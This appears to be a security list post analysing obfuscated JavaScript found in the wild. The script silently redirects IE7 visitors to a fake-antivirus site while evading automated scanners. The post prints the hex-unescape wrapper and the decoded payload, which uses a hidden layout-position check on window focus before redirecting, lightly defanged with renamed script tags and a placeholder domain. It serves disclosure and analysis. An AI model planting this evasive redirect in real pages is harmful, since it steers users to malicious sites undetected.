Code found in the wild opens and renders hostile fakeav page on another
site without warning on fully updated IE7 on XP SP2 or XP SP3 32-bit
with current patches. Under IE8, user gets a warning before the hostile
site gets rendered. No warning under IE7. AV also failed to catch the
secondary hostile page until after rendering was complete. AV client
involved was outdated engine with current definitions, and not worth
maligning. Not tested with modern AV.
Not sure what if anything is new about this, but the obfuscation and the
client behavior suggest something of interest. The point seems to be to
render known bad code from a page that robot testers will find to be
clean, and possibly to bypass AV auto-protection.
The exploit was obfuscated javascript. VirusTotal had no complaints
about the script below, whether obfuscated or not.
Here is the script wrapper. I changed script to sXXcript.
<sXXcript type="text/javascript">
document.write( unescape( 'hex for the code below' ) );
</sXXcript>
Nothing at all interesting about the wrapper that I see.
Here is the unescaped child script. I changed the target site name,
which was a different domain from the one where this script was found.
<sXXcript language="javascript">
document.write('<div style="overflow:auto; height: 1px; width:
600px;">');
document.write('<table width="100%">');
document.write('<tr>');
document.write('<td id="first">This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('</tr>');
document.write('<tr>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td id="second">This is good site</td>');
document.write('</tr>');
document.write('</table>');
document.write('</div>');
var D=document;
function AbsPos(O, Parent){
var X=0, Y=0, Next, D=document;
Next=O;
if (Parent==null) Parent=D;
while (Next!=null && Next!==Parent){
Y+=Next.offsetTop; X+=Next.offsetLeft; Next=Next.offsetParent;
}
return [X, Y];
}
window.onfocus = function() {
var first = AbsPos(D.getElementById('first'));
var second = AbsPos(D.getElementById('second'));
if (first[0] != second[0]) {
document.location.href = "http://badsite.bad";;
}
}
</sXXcript>
